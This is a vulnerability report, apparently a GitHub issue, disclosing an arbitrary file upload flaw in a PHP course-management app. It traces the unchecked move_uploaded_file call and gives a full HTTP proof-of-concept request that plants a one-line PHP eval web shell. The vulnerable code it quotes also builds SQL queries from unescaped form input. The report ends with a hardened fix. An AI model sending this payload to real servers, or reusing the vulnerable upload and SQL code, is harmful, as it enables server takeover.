IMS has an arbitrary file upload vulnerability #2

Open
huclilu opened this issue Nov 14, 2022 · 0 comments


huclilu commented Nov 14, 2022

Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

1. File upload vulnerability

In the file admin_area/courseinsert.php, lines 234-239 of the code:

<table border='2' align="center"><form method="post" action="course_insert.php" enctype="multipart/form-data">
    <tr><td>COURSE NAME : </td><td><input type="text" name="cname" required="" autocomplete="off"></td></tr>
    <tr><td>DURATION : </td><td><input type="text" name="drn" required="" autocomplete="off"></td></tr>
    <tr><td>FEES : </td><td><input type="text" name="fee" required="" autocomplete="off"></td></tr>
    <tr><td>UPLOAD PHOTO :</td><td><input type="file" name="pht" required="" autocomplete="off"></td></tr>
    <tr><td></td><td><button class="btn btn-primary btn-lg">Insert Course</button></td></tr>

After entering the information, clicking the button sends it by POST to course_insert.php. Continuing to follow the code:

course_insert.php, lines 10-13:

$fname=$_FILES['pht']['name'];              // client-supplied filename, used unchanged
$file_temp_loc =$_FILES['pht']['tmp_name'];
$file_store="courseimg/".$fname;            // destination built directly from that name
move_uploaded_file($file_temp_loc,$file_store); // no type, extension or size check before the move

$_FILES gets the file information uploaded by POST, and $file_store defines the file storage location. In this process, the uploaded file type is not verified. The move_uploaded_file() function transfers every uploaded file to the courseimg/ directory.

In lines 14 to 28:

$s=mysqli_query($con,"insert into course(c_name,duration,fees,photo) values('$cname','$drn','$fee','$file_store')");
if($s==1)
{
    $t=mysqli_query($con,"select * from course where c_name='$cname'");
    $r=mysqli_fetch_array($t);
    $id=$r['id'];
    $i=100+$id;
    $uid="BTT/CRS/".$i;
    $udt=mysqli_query($con,"update course set c_id='$uid' where c_name='$cname'");
    header("location:courseinsert.php?ms=done");
}
else
{
    header("location:courseinsert.php?ms=not_done");
}

mysqli_query returns the execution result of the database statement, so $s is the value returned by executing the SQL statement. If the SQL statement executes successfully it returns true, i.e. $s==1, and once the new data is inserted into the database the URL redirects to courseinsert.php?ms=done.

Otherwise, the URL redirects to courseinsert.php?ms=not_done.

To sum up, in the process of uploading a file, the file is first uploaded to the local courseimg directory, and then the path of the successfully uploaded file is saved in the database.

Therefore, even if the uploaded file's record is not stored in the database, the uploaded file itself is still saved in the courseimg/ directory under the current path, which is admin_area/courseimg/.

Upload-POC:

POST /admin_area/course_insert.php HTTP/1.1
Host: imsvul.test
Content-Length: 500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1EAN9nvnAL0aI3UM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/courseinsert.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close

------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="cname"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="drn"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="fee"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="pht"; filename="ace.php"
Content-Type: application/octet-stream

<?php eval($_POST["ace"]);?>
------WebKitFormBoundary1EAN9nvnAL0aI3UM--

After sending the POC packet, check admin_area/courseimg/: a PHP file named ace is generated under that directory.

Connect using the webshell administration tool.
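For contrast with the vulnerable lines 10-13 above, here is a hardened replacement for the upload step of course_insert.php. This is an added example, not code from the IMS project; it assumes `$con` is an open mysqli connection and that the form field names from courseinsert.php are unchanged.

```php
<?php
// Added example (not IMS project code): hardened upload handling for
// course_insert.php. Assumes $con is an open mysqli connection.

function reject(string $reason): void
{
    // Same failure redirect the original uses; the reason goes to the log only.
    error_log("course_insert upload rejected: $reason");
    header('Location: courseinsert.php?ms=not_done');
    exit;
}

// 1. Make sure PHP really received a file through a POST upload.
if (!isset($_FILES['pht']) || $_FILES['pht']['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES['pht']['tmp_name'])) {
    reject('no valid upload');
}
$tmp = $_FILES['pht']['tmp_name'];

// 2. Cap the size before inspecting content (2 MiB chosen for this example).
if ($_FILES['pht']['size'] > 2 * 1024 * 1024) {
    reject('file too large');
}

// 3. Decide the type from the bytes, never from the client-supplied filename
//    or Content-Type, and map each allowed type to a fixed extension.
$allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
if (!isset($allowed[$mime]) || getimagesize($tmp) === false) {
    reject("disallowed type $mime");
}

// 4. Discard the client's filename: a random name plus the extension derived
//    from the detected type means a name like "ace.php" is never written.
$fname = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
$file_store = __DIR__ . '/courseimg/' . $fname;
if (!move_uploaded_file($tmp, $file_store)) {
    reject('move failed');
}
chmod($file_store, 0644); // readable, never executable

// 5. Record the relative path with a prepared statement instead of
//    interpolating form values into the query string.
$photo = 'courseimg/' . $fname;
$cname = $_POST['cname'] ?? ''; $drn = $_POST['drn'] ?? ''; $fee = $_POST['fee'] ?? '';
$stmt = $con->prepare('INSERT INTO course (c_name, duration, fees, photo) VALUES (?, ?, ?, ?)');
$stmt->bind_param('ssss', $cname, $drn, $fee, $photo);
if (!$stmt->execute()) {
    reject('insert failed');
}
header('Location: courseinsert.php?ms=done');
```

As defence in depth, the web server should also be configured not to execute scripts from courseimg/, so that a validation bypass still cannot yield code execution.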
